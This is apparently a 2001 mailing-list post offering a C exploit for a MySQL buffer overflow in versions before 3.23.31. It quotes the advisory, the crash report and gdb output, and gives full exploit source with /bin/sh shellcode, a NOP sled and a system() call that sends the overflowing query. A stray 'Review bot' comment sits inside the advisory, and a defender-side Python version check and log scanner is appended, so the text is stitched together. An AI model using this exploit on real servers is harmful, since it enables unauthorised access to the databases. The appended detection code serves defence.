Hello...
Here's an exploit for this...
[See attached...]

Regardz,
Luis Miguel Silva aka wC

Member of lonoss.org and unsecurity.org
http://www.lonoss.org/
http://www.unsecurity.org/
http://www.ispgaya.pt/ Student

Personal WebPage at:
http://paginas.ispgaya.pt/~lms/
&&
http://www.unsecurity.org/wC/

Personal Code at:
www.unsecurity.org/wC/MyCode/


/*

 Linux MySQL Exploit by Luis Miguel Silva [aka wC]
 [EMAIL PROTECTED]
 19/01/y2k+1

 Compile:

   gcc MySQLXploit.c -o MySQLX

 Run with:

   You can specify the offset for the exploit passing it as the 1st arg...

   Example: ./MySQLX 0 ---> this is the default offset :]

 Advisory:
 [from a bugtraq email]

 Hi,

 all versions of MySQL < 3.23.31 have a buffer-overflow which crashes the
 server and which seems to be exploitable (ie. 4141414 in eip)

 Problem :
 An attacker could gain mysqld privileges (gaining access to all the
 databases)

 Requirements :
 You need a valid login/password to exploit this

 Solution :
 Upgrade to 3.23.31

 Proof-of-concept code :
 None

 Credits :
 I'm not the discoverer of this bug
 The first public report was made by [EMAIL PROTECTED] via the MySQL
 mailing-list
 See the following mails for details

 Regards,
 Nicob

 Here is the original post to the MySQL mailing-list:
 ==================================================

 On Jan 12, João Gouveia wrote:
 > Hi,
 >
 > I believe I've found a problem in MySql. Here are some tests I've made in
 > 3.22.27 x86( also tested on v3.22.32 - latest stable, although I didn't
 > debug it, just tested to see if crashes ).Confirmed up to latest 3.23

 > On one terminal:
 > <quote>
 > spike:/var/mysql # /sbin/init.d/mysql start
 > Starting service MySQL.
 > Starting mysqld daemon with databases from /var/mysql
 > done
 > spike:/var/mysql #
 ></quote>
 >
 > On the other terminal:
 > <quote>
 > jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
 > Enter password:
 > (hanged..^C)
 > </quote>
 >
 > On the first terminal I got:
 > <quote>
 > spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
 > nohup
 > $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
 > g "$@" >>$err_log 2>&1>
 > Number of processes running now: 0
 > mysqld restarted on  Fri Jan 12 07:10:54 WET 2001
 > mysqld daemon ended
 > </quote>
 >
 > gdb shows the following:
 > <quote>
 > (gdb) run
 > Starting program: /usr/sbin/mysqld
 > [New Thread 16897 (manager thread)]
 > [New Thread 16891 (initial thread)]
 > [New Thread 16898]
 > /usr/sbin/mysqld: ready for connections
 > [New Thread 16916]
 > [Switching to Thread 16916]
 >
 > Program received signal SIGSEGV, Segmentation fault.
 > 0x41414141 in ?? ()
 > (gdb) info all-registers
 > eax            0x1      1
 > ecx            0x68     104
 > edx            0x8166947        135686471
 > ebx            0x41414141       1094795585
 > esp            0xbf5ff408       0xbf5ff408
 > ebp            0x41414141       0x41414141
 > esi            0x41414141       1094795585
 > edi            0x0      0
 > eip            0x41414141       0x41414141
 > eflags         0x10246  66118
 > cs             0x23     35
 > ss             0x2b     43
 > ds             0x2b     43
 > es             0x2b     43
 > fs             0x0      0
 > gs             0x0      0
 > (gdb)
 > </quote>
 >
 > looks like a typical overflow to me.
 > Please reply asap, at least to tell me I'm not seeing things. :-)>
 > Best regards,
 >
 > Joao Gouveia aka Tharbad.
 >
 > [EMAIL PROTECTED]

 Here is the response to an email I sent today to the MySQL list:
 ============================================================

 Sergei Golubchik (MySQL team) wrote :
 >
 > Hi!
 >
 > On Jan 18, Nicolas GREGOIRE wrote:
 > > Hi,
 > >
 > > Still not any info about the buffer-overflow discovered last week ?
 > > Shouldn't be fixed at the beginning of the week ?
 > >
 > > Please, dear MySQL team, give us info !!
 > >
 > > Regards,
 > > Nicob
 >
 > Fixed in latest release (3.23.31).
 >
 > Regards,
 > Sergei

 Here is a part of the 3.23.30 to 3.23.31 diff:
 =============================================

 +Changes in release 3.23.31
 +--------------------------
 +
 +   * Fixed security bug in something (please upgrade if you are using a
 +     earlier MySQL 3.23 version).

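 Review bot: the changelog entry "Fixed security bug in something" names neither the affected component nor the kind of bug, so an administrator reading the release notes cannot tell whether 3.23.31 covers the identifier overflow reported on the list on Jan 12 (the 'select a.<130 x A>.b' crash quoted above) or judge how urgent the upgrade is; suggest stating what was fixed and pointing at the list report. Also, "using a earlier MySQL 3.23 version" should read "using an earlier MySQL 3.23 version".
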
 End of Advisory

 Final Words: Yes..I'm still alive...<g> [just a'sleep..]

 A big kiss to niness and hugs to all my friends...
 lucipher && all of the unsecurity.org crew...
 JFA and all of the AngelSP [pseudo :P]'crew...
 Ahmm...I just wave everybody :]

*/



#include <stdio.h>
#include <stdlib.h>   /* malloc, atoi, exit, system */
#include <string.h>   /* strlen */
#include <stdint.h>   /* uint32_t: the target is 32-bit x86, so addresses are 4 bytes */

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 130
#define RET_ADDR 0x41414141
#define NOP 0x90

// Our EVIL code...
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

// Where it all happens...
int main(int argc, char *argv[])
{
 char *buffer, *ptr, tmp[1500];
 uint32_t *addr_ptr, addr;   // 4-byte words, so the address fill below steps 4 bytes on any host
 int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;

 printf("\nMySQL [all versions < 3.23.31] Local Exploit by [EMAIL PROTECTED]\n\n");
 if (argc==2) offset=atoi(argv[1]);
 else
   printf("Happy thoughts: Did you know you can pass an offset as argv[1]? :]\n");

 printf("Trying to allocate memory for buffer (%d bytes)...",bsize);
 // +4 so the word-by-word fill cannot run past the end when bsize is not a multiple of 4
 if (!(buffer = malloc(bsize+4))) {
   printf("ERROR!\n");
   printf("Couldn't allocate memory...\n");
   printf("Exiting...\n");
   exit(0);
 }
 printf("SUCCESS!\n");
 addr=RET_ADDR-offset;
 printf("Using address : 0x%x\n", addr);
 printf("Offset        : %d\n",offset);
 printf("Buffer Size   : %d\n",bsize);
 // fill the whole buffer with the return address...
 ptr=buffer;
 addr_ptr=(uint32_t *) ptr;
 for (i=0;i<bsize;i+=4) *(addr_ptr++)=addr;
 // ...overwrite the first half with NOPs...
 for (i=0;i<bsize/2;i++) buffer[i]=NOP;
 // ...and centre the shellcode in the buffer
 ptr=buffer+((bsize/2)-(strlen(shellcode)/2));
 for (i=0;i<(int)strlen(shellcode);i++) *(ptr++)=shellcode[i];
 buffer[bsize-1]='\0';
 // the buffer becomes the identifier in 'select a.<buffer>.b', the query from the advisory
 snprintf(tmp,sizeof(tmp),"mysql -p -e 'select a.'%s'.b'",buffer);
 printf("Oh k...i have the evil'buffer right here :P\n");
 printf("So...[if all went well], prepare to be r00t...\n");
 system(tmp);
 free(buffer);
 return 0;
}
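A defender-side companion to the post above, added here as an example (not code from the original post or from the MySQL project): one function decides whether a reported mysqld version predates the fixed release 3.23.31, and another scans query text for identifier-like tokens far longer than MySQL's 64-character identifier limit (that limit, the sample queries and all function names are assumptions of this example; the post's crash query carried a 130-byte name).

```python
# Defender-side checks for the MySQL < 3.23.31 identifier overflow (added example).
import re

FIXED_VERSION = (3, 23, 31)  # the release the MySQL team reported as fixed
# Assumption of this example: MySQL caps identifiers at 64 characters, so a
# legitimate query never carries a name close to the post's 130-byte one.
MAX_IDENTIFIER_LEN = 64

_STRING_LITERAL = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"")
_IDENTIFIER = re.compile(r"`([^`]+)`|([A-Za-z_][A-Za-z0-9_$]*)")

def parse_version(version):
    """'3.23.30-log' -> (3, 23, 30); anything after the third number is ignored."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unrecognised version string: %r" % version)
    return tuple(int(x) for x in m.groups())

def is_affected_version(version):
    """True when a reported mysqld version predates the fixed release."""
    return parse_version(version) < FIXED_VERSION

def find_oversized_identifiers(query, max_len=MAX_IDENTIFIER_LEN):
    """(first 16 chars, length) of each identifier-like token longer than max_len;
    string literals are blanked first so long data values are not taken for names."""
    stripped = _STRING_LITERAL.sub("''", query)
    hits = []
    for m in _IDENTIFIER.finditer(stripped):
        ident = m.group(1) or m.group(2)
        if len(ident) > max_len:
            hits.append((ident[:16] + "...", len(ident)))
    return hits

def scan_query_log(lines, max_len=MAX_IDENTIFIER_LEN):
    """[(line_no, hits)] for the log lines that carry oversized identifiers."""
    flagged = []
    for n, line in enumerate(lines, 1):
        hits = find_oversized_identifiers(line, max_len)
        if hits:
            flagged.append((n, hits))
    return flagged

# Constructed sample queries (not real log data): the second mirrors the
# post's 'select a.<130 x A>.b' crash query, the third is a long literal.
SAMPLE_LOG = [
    "select name from customers where id = 42",
    "select a." + "A" * 130 + ".b",
    "insert into t values ('" + "B" * 200 + "')",
]
```

Running `scan_query_log(SAMPLE_LOG)` flags only the second query; the 200-byte string literal in the third is data, not a name, and is left alone.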
